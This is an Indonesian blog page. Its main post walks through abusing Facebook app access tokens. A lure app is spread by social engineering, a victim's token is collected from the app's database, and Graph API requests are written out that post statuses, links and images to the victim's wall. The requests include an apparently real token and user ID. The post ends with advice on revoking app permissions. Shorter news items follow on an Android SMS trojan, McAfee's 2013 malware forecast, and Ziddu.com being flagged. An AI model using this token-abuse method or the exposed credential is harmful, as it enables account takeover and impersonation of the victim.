Translate

Selasa, 01 Januari 2013

Bahaya Access Token Terhadap Akun Facebook



Apa itu Access Token ?
Access Token merupakan struktur data yang berisi informasi keamanan yang dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun Facebook) atau proses lainnya yang membutuhkan otorisasi.

Dari mana Access Token tercipta ?
Seperti yang kita ketahui bersama, Facebook memiliki ribuan bahkan mungkin jutaan apps (aplikasi) untuk memanjakan penggunanya. Dari setiap penggunaan apps tersebutlah Access Token tercipta. Setiap Access Token akan tersimpan pada server hostingan pembuat aplikasi Facebook.

Kenapa dikatakan Access Token berbahaya ?
Apabila Access Token akun Facebook anda diketahui oleh orang yang tidak bertanggung jawab maka orang tersebut dapat meng-update-kan status Facebook anda, mem-posting link dan dapat pula memasukkan foto/gambar tanpa perlu melakukan login ke akun Facebook anda. Mungkin diantara kita pernah mendengar beberapa kasus pengguna Facebook berurusan dengan pihak Kepolisian bahkan sampai ke depan meja hijau akibat dari status Facebook-nya.

Bagaimana proses kerjanya ?
Di sini saya akan mempraktekkan proses kerjanya, bukan mengajarkan. Dan di akhir penjelasan nanti akan dijelaskan bagaimana cara untuk menghindarinya. Baiklah, mari kita mulai.
  1. Pertama – tama saya akan login ke akun Facebook saya sendiri. Antara akun Facebook sayadengan Facebook korban tidak saling berteman. (jika berteman lebih baik lagi)
  2. Sebelumnya, saya telah membuat sebuah aplikasi sederhana di Facebook. Dengan memanfaatkan tekhnik social engineering saya memberikan link aplikasi Facebook itu kepada korban agar tergiur untuk menggunakannya. Link aplikasinya adalahhttp://apps.facebook.com/via_apa_saja/ (Aplikasi Update Status Facebook Via Apa Saja)

  3. Sang korban tergiur dan menggunakan aplikasi Facebook dari saya.

    Bahaya Access Token Terhadap Akun Facebook Anda | blog.cyber4rt.com
  4. Untuk lebih memastikan apakah korban sudah menggunakan aplikasi Facebook dari saya, langsung saja saya login ke cpanel lalu menuju ke phpMyAdmin.

    Bahaya Access Token Terhadap Akun Facebook Anda | blog.cyber4rt.com

    Dan ternyata si korban telah menggunakan aplikasi Facebook dari saya. Yang ditandai kotak warna merah adalah access_token Facebook korban.
  5. Mari kita coba untuk meng-update-kan status Facebook korban dengan sedikit “injeksi url”
    Injeksi url :
    https://graph.facebook.com/ID-FACEBOOK/feed?method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

    Menjadi :
    https://graph.facebook.com/100003787395136/feed?method=POST&message=Test update status online :lol:&access_token=AAAFc7v
    0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47c
    NL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD


    Untuk melihat hasilnya silakan Anda klik "injeksi url" di atas lalu buka wall profil Facebook korban
  6. Selanjutnya kita coba untuk mem-posting LINK ke akun Facebook korban.
    Injeksi url :
    https://graph.facebook.com/ID/feed?method=POST&link=URL&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

    Menjadi :
  7. Terakhir, saya akan memasukkan sebuah gambar ke dalam akun Facebook korban.
    Injeksi url :
    https://graph.facebook.com/photos?url=URL GAMBAR&method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

    Menjadi :
    https://graph.facebook.com/photos?url=http://www.cyber4rt.com/logo.gif&method=POST&message=TEST UPLOAD GAMBAR&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD
Bahaya Access Token Terhadap Akun Facebook Anda | blog.cyber4rt.com


Bagaimana cara menghindari penggunaan Access Token oleh orang yang tidak bertanggung jawab ?Cara untuk menghindarinya cukup mudah yaitu :
  1. Masuk ke Pengaturan Privasi Aplikasi Facebook
  2. Cari aplikasi Facebook yang mencurigakan, contoh pada demo kali ini aplikasinya bernama ACCESS_TOKEN, klik edit (sunting) pada aplikasi tersebut.
  3. Di sini ada beberapa pilihan, perhatikan gambar di bawah ini
Bahaya Access Token Terhadap Akun Facebook Anda | blog.cyber4rt.com
ket :
merah : menghapus aplikasi dari akun Facebook Anda (direkomendasikan)
biru : menghapus akses aplikasi yang tidak Anda inginkan (pilihan)
hijau : mengatur siapa saja yang dapat melihat posting-an dari aplikasi, pilih "Only Me" (pilihan)

Akhir kata, jangan sembarang menggunakan aplikasi Facebook. Gunakan aplikasi Facebook hanya dari 
sumber yang terpercaya. Sekian dan terima kasih, lebih dan kurangnya mohon dimaafkan.


Referensi :
http://id.wikipedia.org/wiki/OAuth
http://id.wikipedia.org/wiki/Access_token
https://developers.facebook.com/docs/reference/api/post/

source of : http://www.cyber4rt.com

Minggu, 30 Desember 2012

Bahaya, Virus Ponsel Android Bisa Menyebar Lewat SMS

Peringatan bagi pengguna Android. Ada serangan trojan baru yang berbahaya dan menyebar cepat melalui SMS dari pengguna ponsel lain. Ponsel Anda dapat diambil alih dan dikendalikan untuk melakukan tindakan kriminal
di dunia maya.

Para peneliti di Symantec menemukan, beberapa ponsel terinfeksi trojan - kemudian ponsel yang terinfeksi itu akan menyerang ponsel lainnya, dengan mengirim SMS ke nomor telepon di buku alamat mereka.
Karena SMS tersebut tampak seperti dari teman, maka serangan itu akan lebih efektif. Trojan baru yang dijuluki “botnet” menyerang dengan “merekrut” ponsel lain untuk mengirimi spam pada teman-teman. SMS yang terkirim biasanya berisikan link untuk mengunduh game gratis atau pemberitahuan menang hadiah.
Namun yang terjadi adalah ketika link tersebut diklik, trojan terinstal. Ponsel yang terinfeksi itu kemudian menjadi bagian dari kendali penjahat dunia maya dengan mengirim spam ke korban lainnya.

Ponsel yang “dikendalikan” oleh trojan tersebut dapat digunakan untuk mendapatkan uang bagi hacker di dunia maya melalui spam yang berisi iklan, dan melalui penggunaan layanan SMS premium yang kemudian ditambahkan ke tagihan pengguna.

Serangan ini merupakan tren baru yang mengkhawatirkan dalam kategori perangkat lunak yang berbahaya, kata pihak Symantec. Serangan tersebut sama seperti jenis serangan spam massal yang terdapat pada PC.

Symantec memprediksi bahwa tren ini akan terus berlanjut dan menyebar. "Meski pengiriman spam oleh botnet bukanlah hal yang baru, teknologi seluler telah membuka perantara serangan baru untuk peretas di dunia maya yang menggunakan teknik serangan rekayasa sosial dan spam yang terbukti sukses pada perangkat seluler," kata Symantec dalam blog resminya.

"Instalasi trojan disembunyikan dari pengguna dan jejak kehadirannya dihapus saat menginstal aplikasi resmi ke perangkat pengguna. Korban hanya melihat aplikasi yang diiklankan, menipu para korban yang memercayai bahwa semua aplikasi itu aman.”

"Pada 2013, mobile adware atau 'madware' akan menjadi sebuah gangguan besar, mengganggu pengguna dan berpotensi mengekspos detail lokasi, informasi kontak, dan pengenal perangkat untuk peretas. Madware — yang menyelinap ke perangkat pengguna ketika mereka mengunduh sebuah aplikasi — sering mengirimkan pemberitahuan pop-up ke papan notifikasi, menambahkan ikon, mengubah pengaturan browser, dan mengumpulkan informasi pribadi.

Hanya dalam sembilan bulan terakhir, jumlah aplikasi termasuk bentuk madware yang paling agresif telah meningkat hingga sebesar 210 persen.

Jumat, 28 Desember 2012

Malware Windows 8 Diprediksi Berkembang Pesat Pada 2013 Mendatang


detail berita

CALIFORNIA Malware yang akan menyerang Windows 8 diprediksi akan semakin berkembang pada tahun depan. Prediksi itu diungkapkan oleh perusahaan antivirus McAfee dalam laporan tahunannya.
 
Dilansir dari Neowin, Jumat (28/12/2012), dalam laporan tahunan itu, McAfee berupaya memprediksi ancaman malwaredan serangan online lainnya dalam 12 bulan mendatang. Laporan yang disampaikan dalam format PDF itu memprediksi, pada 2013 akan terlihat perkembangan pesat cara menyerang Windows 8.
 
Meski McAfee mengatakan Windows 8 lebih aman dibandingkan versi Windows terdahulu, tapi bukan berarti pencipta malware dan hacker akan diam begitu saja. "Kini pasar underground serangan danmalware lebih kompetitif dibandingkan tiga tahun lalu. Kemungkinan malware yang menargetkan Windows 8 akan lebih cepat tersedia daripada kehadiran malware yang menyerang Windows 7," demikian isi laporan McAfee.
 
Untuk itu, pengguna Windows diharuskan untuk tetap menghindari penipuan phishing yang bisa menjadi jalan malware menyusupi PC Windows 8.
 
Laporan McAfee juga memprediksi ancaman lain yang akan menjadi masalah bagi industri PC dan internet pada 2013, termasuk ancaman dari website berbasis HTML5 dan aplikasi. "Kami yakin penyerang akan mengalihkan perhatian mereka untuk menemukan lubang keamanan HTML 5 pada 2013. Pertanyaannya sekarang ialah seberapa cepat mereka akan berhasil," jelas laporan McAfee.

Kamis, 27 Desember 2012

Ziddu.com telah dinyatakan sebagai situs berbahaya oleh google.


Ziddu.com telah dinyatakan sebagai situs berbahaya oleh google.
pagi ini tanggal 28/12/12
ketika saya mau mendownload sebuah file entah kenapa, seketika muncul pesan dari google,dan kebetulan juga saya lagi menggunakan web... google chr*me jadi pesan itu dari Crhome. yang isinya :
  








den deng,, saya baru ingat kalau saya menggunakan adf.ly yang sumbernya kebanyakan menggunakan zi**u langsung dah ga pake panjang lebar saya ganti,,, 

Sekian brita pagi ini Terima kasih

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | coupon codes